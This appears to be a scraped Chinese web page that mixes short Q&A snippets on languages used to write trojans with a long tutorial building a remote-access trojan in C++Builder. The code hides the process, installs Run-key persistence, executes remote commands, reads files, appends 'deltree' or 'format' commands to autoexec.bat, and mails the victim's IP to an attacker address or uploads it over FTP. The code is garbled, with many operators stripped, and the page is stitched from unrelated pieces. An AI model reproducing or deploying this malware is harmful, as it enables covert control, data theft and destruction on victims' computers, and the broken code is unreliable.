木馬用哪些編程語言寫的？

一般是用VB或delphi編程語言來編寫木馬、病毒

目前成都創(chuàng)新互聯(lián)已為1000多家的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)站空間、網(wǎng)站托管、服務(wù)器租用、企業(yè)網(wǎng)站設(shè)計、貞豐網(wǎng)站維護(hù)等服務(wù)，公司將堅持客戶導(dǎo)向、應(yīng)用為本的策略，正道將秉承"和諧、參與、激情"的文化，與客戶和合作伙伴齊心協(xié)力一起成長，共同發(fā)展。

別小看

那幾K東西喲，或許你就會愛上他！想編寫木馬，你可以多掌握宏觀的計算機(jī)知識，比如木馬有多少方法傳送！用什么手段在傳播！用什么方法來回避殺毒軟件！用什么方法監(jiān)控你的計算機(jī)！用什么方法運行還不會讓你感覺機(jī)器卡！編寫很容易

！

想作個NO1的木馬

不是那么容易的！熊貓燒香這個病毒是借用蠕蟲病毒的變種，加上自己的程序而成的！變異：也就是這么產(chǎn)生的，電腦病毒不會想生物體病毒那么樣自己來變異，而是認(rèn)為的來變異！

木馬一般用什么語言編

編寫木馬程序的計算機(jī)語言有很多，比如，有C++、VB、易語言等；

木馬（Trojan）,也稱木馬病毒，是指通過特定的程序（木馬程序）來控制另一臺計算機(jī)。木馬通常有兩個可執(zhí)行程序：一個是控制端，另一個是被控制端。

“木馬”程序是目前比較流行的病毒文件，與一般的病毒不同，它不會自我繁殖，也并不“刻意”地去感染其他文件，它通過將自身偽裝吸引用戶下載執(zhí)行，向施種木馬者提供打開被種主機(jī)的門戶，使施種者可以任意毀壞、竊取被種者的文件，甚至遠(yuǎn)程操控被種主機(jī)

如何編寫木馬

木馬是如何編寫的（一）

特洛依木馬這個名詞大家應(yīng)該不陌生，自從98年“死牛崇拜”黑客小組公布Back Orifice以來，木馬猶如平地上的驚雷，使在Dos??Windows時代中長大的中國網(wǎng)民從五彩繽紛的網(wǎng)絡(luò)之夢中驚醒，終于認(rèn)識到的網(wǎng)絡(luò)也有它邪惡的一面，一時間人心惶惶。

我那時在《電腦報》上看到一篇文章，大意是一個菜鳥被人用BO控制了，嚇得整天吃不下飯、睡不著覺、上不了網(wǎng)，到處求救！呵呵，要知道，木馬（Trojan）的歷史是很悠久的：早在ATT Unix和BSD Unix十分盛行的年代，木馬是由一些玩程式（主要是C）水平很高的年輕人（主要是老美）用C或Shell語言編寫的，基本是用來竊取登陸主機(jī)的口令，以取得更高的權(quán)限。那時木馬的主要方法是誘騙??先修改你的.profile文件，植入木馬；當(dāng)你登陸時將你敲入的口令字符存入一個文件，用Email的形式發(fā)到攻擊者的郵箱里。國內(nèi)的年輕人大都是在盜版Dos的熏陶下長大的，對網(wǎng)絡(luò)可以說很陌生。直到Win9x橫空出世，尤其是WinNt的普及，大大推動了網(wǎng)絡(luò)事業(yè)的發(fā)展的時候，BO這個用三年后的眼光看起來有點簡單甚至可以說是簡陋的木馬（甚至在Win9x的“關(guān)閉程序”對話框可以看到進(jìn)程）給了當(dāng)時中國人極大的震撼，它在中國的網(wǎng)絡(luò)安全方面可以說是一個劃時代的軟件。

自己編寫木馬，聽起來很Cool是不是？！木馬一定是由兩部分組成??服務(wù)器程序（Server）和客戶端程序（Client），服務(wù)器負(fù)責(zé)打開攻擊的道路，就像一個內(nèi)奸特務(wù)；客戶端負(fù)責(zé)攻擊目標(biāo)，兩者需要一定的網(wǎng)絡(luò)協(xié)議來進(jìn)行通訊（一般是TCP/IP協(xié)議）。為了讓大家更好的了解木馬攻擊技術(shù)，破除木馬的神秘感，我就來粗略講一講編寫木馬的技術(shù)并順便編寫一個例子木馬，使大家能更好地防范和查殺各種已知和未知的木馬。

首先是編程工具的選擇。目前流行的開發(fā)工具有C++Builder、VC、VB和Delphi，這里我們選用C++Builder（以下簡稱BCB）；VC雖然好，但GUI設(shè)計太復(fù)雜，為了更好地突出我的例子，集中注意力在木馬的基本原理上，我們選用可視化的BCB；Delphi也不錯，但缺陷是不能繼承已有的資源（如“死牛崇拜”黑客小組公布的BO2000源代碼，是VC編寫的，網(wǎng)上俯拾皆是）；VB嘛，談都不談??難道你還給受害者傳一個1兆多的動態(tài)鏈接庫??Msvbvm60.dll嗎？

啟動C++Builder 5.0企業(yè)版，新建一個工程，添加三個VCL控件：一個是Internet頁中的Server Socket，另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個服務(wù)器程序，可以對外服務(wù)（對攻擊者敞開大門）。Socket最初是在Unix上出現(xiàn)的，后來微軟將它引入了Windows中（包括Win98和WinNt）；后兩個控件的作用是用來使程序具有FTP（File Transfer Protocol文件傳輸協(xié)議）和SMTP（Simple Mail Transfer Protocol簡單郵件傳輸協(xié)議）功能，大家一看都知道是使軟件具有上傳下載功能和發(fā)郵件功能的控件。

Form窗體是可視的，這當(dāng)然是不可思議的。不光占去了大量的空間（光一個Form就有300K之大），而且使軟件可見，根本沒什么作用。因此實際寫木馬時可以用一些技巧使程序不包含F(xiàn)orm，就像Delphi用過程實現(xiàn)的小程序一般只有17K左右那樣。

我們首先應(yīng)該讓我們的程序能夠隱身。雙擊Form，首先在FormCreate事件中添加可使木馬在Win9x的“關(guān)閉程序”對話框中隱藏的代碼。這看起來很神秘，其實說穿了不過是一種被稱之為Service的后臺進(jìn)程,它可以運行在較高的優(yōu)先級下,可以說是非常靠近系統(tǒng)核心的設(shè)備驅(qū)動程序中的那一種。因此，只要將我們的程序在進(jìn)程數(shù)據(jù)庫中用RegisterServiceProcess()函數(shù)注冊成服務(wù)進(jìn)程（Service Process）就可以了。不過該函數(shù)的聲明在Borland預(yù)先打包的頭文件中沒有，那么我們只好自己來聲明這個位于KERNEL32.DLL中的鳥函數(shù)了。

首先判斷目標(biāo)機(jī)的操作系統(tǒng)是Win9x還是WinNt：

{

DWORD dwVersion = GetVersion();

// 得到操作系統(tǒng)的版本號

if (dwVersion = 0x80000000)

// 操作系統(tǒng)是Win9x，不是WinNt

{

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

file://定義RegisterServiceProcess()函數(shù)的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary("KERNEL32");

file://加載RegisterServiceProcess()函數(shù)所在的動態(tài)鏈接庫KERNEL32.DLL

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

file://得到RegisterServiceProcess()函數(shù)的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1);

file://執(zhí)行RegisterServiceProcess()函數(shù),隱藏本進(jìn)程

FreeLibrary(hDLL);

file://卸載動態(tài)鏈接庫

}

}

這樣就終于可以隱身了（害我敲了這么多代碼?。槭裁匆袛嗖僮飨到y(tǒng)呢？因為WinNt中的進(jìn)程管理器可以對當(dāng)前進(jìn)程一覽無余，因此沒必要在WinNt下也使用以上代碼（不過你可以使用其他的方法，這個留到后面再講）。接著再將自己拷貝一份到%System%目錄下，例如：C:\Windows\System，并修改注冊表，以便啟動時自動加載：

{

char TempPath[MAX_PATH];

file://定義一個變量

GetSystemDirectory(TempPath ,MAX_PATH);

是system目錄緩沖區(qū)的地址,MAX_PATH是緩沖區(qū)的大小，得到目標(biāo)機(jī)的System目錄路徑

SystemPath=AnsiString(TempPath);

file://格式化TempPath字符串，使之成為能供編譯器使用的樣式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);

file://將自己拷貝到%System%目錄下，并改名為Tapi32.exe，偽裝起來

Registry=new TRegistry;

file://定義一個TRegistry對象，準(zhǔn)備修改注冊表，這一步必不可少

Registry-RootKey=HKEY_LOCAL_MACHINE;

file://設(shè)置主鍵為HKEY_LOCAL_MACHINE

Registry-OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);

file://打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就創(chuàng)建之

try

{

file://如果以下語句發(fā)生異常，跳至catch，以避免程序崩潰

if(Registry-ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

Registry-WriteString("crossbow",SystemPath+"\\Tapi32.exe");

file://查找是否有“crossbow”字樣的鍵值，并且是否為拷貝的目錄%System%+Tapi32.exe

file://如果不是，就寫入以上鍵值和內(nèi)容

}

catch(...)

{

file://如果有錯誤，什么也不做

}

}

好，F(xiàn)ormCreate過程完成了，這樣每次啟動都可以自動加載Tapi32.exe，并且在“關(guān)閉程序”對話框中看不見本進(jìn)程了，木馬的雛形初現(xiàn)。

接著選中ServerSocket控件，在左邊的Object Inspector中將Active改為true，這樣程序一啟動就打開特定端口，處于服務(wù)器工作狀態(tài)。再將Port填入4444，這是木馬的端口號，當(dāng)然你也可以用別的。但是你要注意不要用1024以下的低端端口，因為這樣不但可能會與基本網(wǎng)絡(luò)協(xié)議使用的端口相沖突，而且很容易被發(fā)覺，因此盡量使用1024以上的高端端口（不過也有這樣一種技術(shù)，它故意使用特定端口，因為如果引起沖突，Windows也不會報錯 ^_^）。你可以看一看TNMFTP控件使用的端口，是21號端口，這是FTP協(xié)議的專用控制端口（FTP Control Port）；同理TNMSMTP的25號端口也是SMTP協(xié)議的專用端口。

再選中ServerSocket控件，點擊Events頁，雙擊OnClientRead事件，敲入以下代碼：

{

FILE *fp=NULL;

char * content;

int times_of_try;

char TempFile[MAX_PATH];

file://定義了一堆待會兒要用到的變量

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());

file://在%System%下建立一個文本文件Win369.bat，作為臨時文件使用

AnsiString temp=Socket-ReceiveText();

file://接收客戶端（攻擊者，也就是你自己）傳來的數(shù)據(jù)

}

好，大門敞開了！接著就是修改目標(biāo)機(jī)的各種配置了！^_^ 首先我們來修改Autoexec.bat和Config.sys吧：

{

if(temp.SubString(0,9)=="edit conf")

file://如果接受到的字符串的前9個字符是“edit conf”

{

int number=temp.Length();

file://得到字符串的長度

int file_name=atoi((temp.SubString(11,1)).c_str());

file://將第11個字符轉(zhuǎn)換成integer型，存入file_name變量

file://為什么要取第11個字符，因為第10個字符是空格字符

content=(temp.SubString(12,number-11)+'\n').c_str();

file://余下的字符串將被作為寫入的內(nèi)容寫入目標(biāo)文件

FILE *fp=NULL;

char filename[20];

chmod("c:\\autoexec.bat",S_IREADS_IWRITE);

chmod("c:\\config.sys",S_IREADS_IWRITE);

file://將兩個目標(biāo)文件的屬性改為可讀可寫

if(file_name==1)

sprintf(filename,"%s","c:\\autoexec.bat");

file://如果第11個字符是1,就把Autoexec.bat格式化

else if(file_name==2)

sprintf(filename,"%s","c:\\config.sys");

file://如果第11個字符是1,就把Config.sys格式化

times_of_try=0;

file://定義計數(shù)器

while(fp==NULL)

{

file://如果指針是空

fp=fopen(filename,"a+");

file://如果文件不存在，創(chuàng)建之；如果存在，準(zhǔn)備在其后添加

file://如果出錯，文件指針為空，這樣就會重復(fù)

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

file://如果已經(jīng)試了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就發(fā)回“Fail By Open File”的錯誤信息

goto END;

file://跳至END處

}

}

fwrite(content,sizeof(char),strlen(content),fp);

file://寫入添加的語句，例如deltree/y C:或者format/q/autotest C:，夠毒吧？！

fclose(fp);

file://寫完后關(guān)閉目標(biāo)文件

Socket-SendText("Sucess");

file://然后發(fā)回“Success”的成功信息

}

}

上回我們講到如何修改目標(biāo)機(jī)上的啟動配置文件，這回我們就來查看目標(biāo)機(jī)上的目錄樹和文件吧，這在客戶端上使用“dir”命令，跟著敲?：

{

else if(temp.SubString(0,3)=="dir")

{

file://如果前3個字符是“dir”

int Read_Num;

char * CR_LF="\n";

int attrib;

char *filename;

DIR *dir;

struct dirent *ent;

int number=temp.Length();

file://得到字符串的長度

AnsiString Dir_Name=temp.SubString(5,number-3);

file://從字符串第六個字符開始，將后面的字符存入Dir_Name變量，這是目錄名

if(Dir_Name=="")

{

file://如果目錄名為空

Socket-SendText("Fail By Open DIR's Name");

file://返回“Fail By Open DIR's Name”信息

goto END;

file://跳到END

}

char * dirname;

dirname=Dir_Name.c_str();

if ((dir = opendir(dirname)) == NULL)

{

file://如果打開目錄出錯

Socket-SendText("Fail by your DIR's name!");

file://返回“Fail By Your DIR's Name”信息

goto END;

file://跳到END

}

times_of_try=0;

while(fp==NULL)

{

file://如果指針是NULL

fp=fopen(TempFile,"w+");

file://就創(chuàng)建system\Win369.bat準(zhǔn)備讀和寫；如果此文件已存在，則會被覆蓋

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

file://如果已經(jīng)試了100次了，仍未成功（真有耐心！）

Socket-SendText("Fail By Open File");

file://就發(fā)回“Fail By Open File”的錯誤信息

goto END;

file://并跳到END處

}

}

while ((ent = readdir(dir)) != NULL)

{

file://如果訪問目標(biāo)目錄成功

if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

file://如果最后一個字符不是“\”，證明不是根目錄

filename=(AnsiString(dirname)+"\\"+ent-d_name).c_str();

file://加上“\”字符后將指針指向目錄流

else

filename=(AnsiString(dirname)+ent-d_name).c_str();

file://如果是根目錄，則不用加“\”

attrib=_rtl_chmod(filename, 0);

file://得到目標(biāo)文件的訪問屬性

if (attrib FA_RDONLY)

file://“”字符是比較前后兩個變量，如果相同返回1,否則返回0

fwrite(" R",sizeof(char),3,fp);

file://將目標(biāo)文件屬性設(shè)為只讀

else

fwrite(" ",sizeof(char),3,fp);

file://失敗則寫入空格

if (attrib FA_HIDDEN)

fwrite("H",sizeof(char),1,fp);

file://將目標(biāo)文件屬性設(shè)為隱藏

else

fwrite(" ",sizeof(char),1,fp);

file://失敗則寫入空格

if (attrib FA_SYSTEM)

fwrite("S",sizeof(char),1,fp);

file://將目標(biāo)文件屬性設(shè)為系統(tǒng)

else

fwrite(" ",sizeof(char),1,fp);

file://失敗則寫入空格

if (attrib FA_ARCH)

fwrite("A",sizeof(char),1,fp);

file://將目標(biāo)文件屬性設(shè)為普通

else

fwrite(" ",sizeof(char),1,fp);

file://失敗則寫入空格

if (attrib FA_DIREC)

fwrite(" DIR ",sizeof(char),9,fp);

file://將目標(biāo)文件屬性設(shè)為目錄

else

fwrite(" ",sizeof(char),9,fp);

file://失敗則寫入空格

fwrite(ent-d_name,sizeof(char),strlen(ent-d_name),fp);

file://將目錄名寫入目標(biāo)文件

fwrite(CR_LF,1,1,fp);

file://寫入換行

}

fclose(fp);

file://關(guān)閉文件

closedir(dir);

file://關(guān)閉目錄

FILE *fp1=NULL;

times_of_try=0;

while(fp1==NULL)

{

fp1=fopen(TempFile,"r");

file://打開Win369.bat準(zhǔn)備讀

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

file://如果已經(jīng)試了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就發(fā)回“Fail By Open File”的錯誤信息

goto END;

file://并跳到END處

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定義的一個空數(shù)組

Read_Num=fread(temp_content,1,300,fp1);

file://從目標(biāo)文件中讀入前300個字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

變量加上剛才的300個字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp1);

file://重復(fù)

};

Return_Text=Return_Text+temp_content;

變量加上剛才的300個字符

fclose(fp1);

file://關(guān)閉目標(biāo)文件

Socket-SendText(Return_Text);

file://返回Return_Text變量的內(nèi)容

}

}

夠長吧？！察看目錄樹這么費勁??？！你后面可以用BCB中的各種列表框?qū)lient.exe好好美化美化。接下來就是查看指定文件的內(nèi)容了，Client將使用“type”命令，（手指累不累啊？）：

{

else if(temp.SubString(0,4)=="type")

{

file://如果前4個字符是“type”

int Read_Num;

int number=temp.Length();

AnsiString File_Name=temp.SubString(6,number-4);

file://將目標(biāo)文件流存入File_Name變量中

times_of_try=0;

while(fp==NULL)

{

fp=fopen(File_Name.c_str(),"r");

file://打開目標(biāo)文件準(zhǔn)備讀

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

file://如果已試了100次了

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的錯誤信息

goto END;

file://跳到END

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定義一個空數(shù)組

Read_Num=fread(temp_content,1,300,fp);

file://從目標(biāo)文件中讀入前300個字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

的內(nèi)容加上剛才的字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp);

file://重復(fù)

};

Return_Text=Return_Text+temp_content;

的內(nèi)容加上剛才的字符

fclose(fp);

file://關(guān)閉目標(biāo)文件

Socket-SendText(Return_Text);

file://返回Return_Text的內(nèi)容，即你查看文件的內(nèi)容

}

}

咳咳！累死了！還是來點輕松的吧??操縱目標(biāo)機(jī)的光驅(qū)（注意：mciSendString()函數(shù)的聲明在mmsystem.h頭文件中）：

{

else if(temp=="open")

{

file://如果收到的temp的內(nèi)容是“open”

mciSendString("set cdaudio door open", NULL, 0, NULL);

file://就彈出光驅(qū)的托盤

}

else if(temp=="close")

{

file://如果收到的temp的內(nèi)容是“close”

mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);

file://就收入光驅(qū)的托盤。當(dāng)然你也可以搞個死循環(huán)，讓他的光驅(qū)好好活動活動！^_^

}

}

接著就是交換目標(biāo)機(jī)的鼠標(biāo)左右鍵，代碼如下：

{

else if(temp=="swap")

{

SwapMouseButton(1);

file://交換鼠標(biāo)左右鍵，簡單吧？

}

}

然后就是使目標(biāo)機(jī)重新啟動。但這里要區(qū)分WinNt和Win9x??NT非常注重系統(tǒng)每個進(jìn)程的權(quán)利，一個普通的進(jìn)程是不應(yīng)具備有調(diào)用系統(tǒng)的權(quán)利的，因此我們要賦予本程序足夠的權(quán)限：

{

else if(temp=="reboot")

{

file://如果收到的temp的內(nèi)容是“temp”

DWORD dwVersion = GetVersion();

file://得到操作系統(tǒng)的版本號

if (dwVersion 0x80000000)

{

file://操作系統(tǒng)是WinNt，不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

file://定義變量

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, hToken);

這個函數(shù)的作用是打開一個進(jìn)程的訪問令牌

函數(shù)的作用是得到本進(jìn)程的句柄

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,tkp.Privileges[0].Luid);

的作用是修改進(jìn)程的權(quán)限

tkp.PrivilegeCount = 1;

file://賦給本進(jìn)程特權(quán)

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE, tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

的作用是通知Windows NT修改本進(jìn)程的權(quán)利

ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);

file://強(qiáng)行退出WinNt并重啟

}

else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);

file://強(qiáng)行退出Win9x并重啟

}

}

如果以上都不是，就讓它在Dos窗口中執(zhí)行傳來的命令：

{

else

{

file://如果都不是

char * CR_TF="\n";

times_of_try=0;

while(fp==NULL)

{

fp=fopen(TempFile,"w+");

file://創(chuàng)建Win369.bat，如果已存在就覆蓋

times_of_try=times_of_try+1;

file://計數(shù)器加1

if(times_of_try100)

{

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的信息

goto END;

file://跳到END

}

}

fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);

file://寫入欲執(zhí)行的命令

fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);

file://寫入換行符

fclose(fp);

file://關(guān)閉Win369.bat

system(TempFile);

file://執(zhí)行Win369.bat

Socket-SendText("Success");

file://返回“Success”信息

}

}

你可以直接執(zhí)行什么Ping和Tracert之類的命令來進(jìn)一步刺探目標(biāo)機(jī)的網(wǎng)絡(luò)狀況（判斷是否是一個企業(yè)的局域網(wǎng)），然后可以進(jìn)一步攻擊，比如Deltree和Format命令。^_^

到此，服務(wù)器程序的功能已全部完成，但還差容錯部分未完成,這樣才能避免程序因意外而崩潰。朋友，別走開?。ㄎ赐甏m(xù)）

木馬是如何編寫的（三）

武漢 周侃

上次已編寫完服務(wù)器端的各種功能，但還差容錯部分還未完成,下面我們Go on! 其代碼如下（照敲不誤 ^_^）：

{

END:;

Socket-Close();

file://關(guān)閉服務(wù)

ServerSocket1-Active =true;

file://再次打開服務(wù)

if (NMSMTP1-Connected) NMSMTP1-Disconnect();

file://如果SMTP服務(wù)器已連接則斷開

NMSMTP1-Host = "smtp.163.net";

file://選一個好用的SMTP服務(wù)器，如163、263、sina和btamail

NMSMTP1-UserID = "";

file://你SMTP的ID

try

{

NMSMTP1-Connect();

file://再次連接

}

catch(...)

{

goto NextTime;

file://跳到NextTime

}

NMSMTP1-PostMessage-FromAddress ="I don't know!";

file://受害者的Email地址

NMSMTP1-PostMessage-FromName = "Casualty";

file://受害者的名字

NMSMTP1-PostMessage-ToAddress-Text = "crossbow@8848.net";

file://將信發(fā)到我的郵箱，這一步很關(guān)鍵

NMSMTP1-PostMessage-Body-Text = AnsiString("Server Running on:") + NMSMTP1-LocalIP ;

file://信的內(nèi)容提示你“服務(wù)器正在運行”，并且告訴你受害者的目前的IP地址，以便連接

NMSMTP1-PostMessage-Subject = "Server Running Now!";

file://信的主題

NMSMTP1-SendMail();

file://發(fā)送！

return;

file://返回

NextTime:

NMFTP1-Host = "";

file://你的FTP服務(wù)器的地址

NMFTP1-UserID = "";

file://你的用戶ID

NMFTP1-Port = 21;

端口號，一般為21

NMFTP1-Password = "";

file://你的FTP的密碼

if(NMFTP1-Connected) NMFTP1-Disconnect();

file://如果已連接就斷開

try

{

NMFTP1-Connect();

file://再連接

}

catch(...)

{

return;

file://返回

}

AnsiString SendToSite = "Server Running on: " + NMFTP1-RemoteIP;

file://受害者的IP地址

FILE * Upload;

Upload = fopen(NMFTP1-RemoteIP.c_str(),"w+");

file://創(chuàng)建一個新文件準(zhǔn)備寫，如果已存在就覆蓋

fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);

file://寫入以上的SendToSite的內(nèi)容

fclose(Upload);

file://寫完后關(guān)閉此文件

NMFTP1-RemoveDir("public_html");

file://刪除public_html目錄

NMFTP1-Upload(NMFTP1-RemoteIP, NMFTP1-RemoteIP);

file://上傳！

}

啊，超長的OnClientRead事件終于寫完了。最后別忘了要在此服務(wù)器源碼文件中添加以下頭文件：

#include stdlib.h

#include dirent.h

#include fcntl.h

#include dos.h

#include sys\stat.h

#include winbase.h

#include stdio.h

#include process.h

#include io.h

#include mmsystem.h

至此，服務(wù)器端（Server）程序

編寫計算機(jī)病毒用哪種語言來編寫最好

應(yīng)該是匯編類語言

木馬多是delphi，系統(tǒng)病毒可以用c,c++，最牛的會用匯編甚至二進(jìn)制碼~手機(jī)的一般用java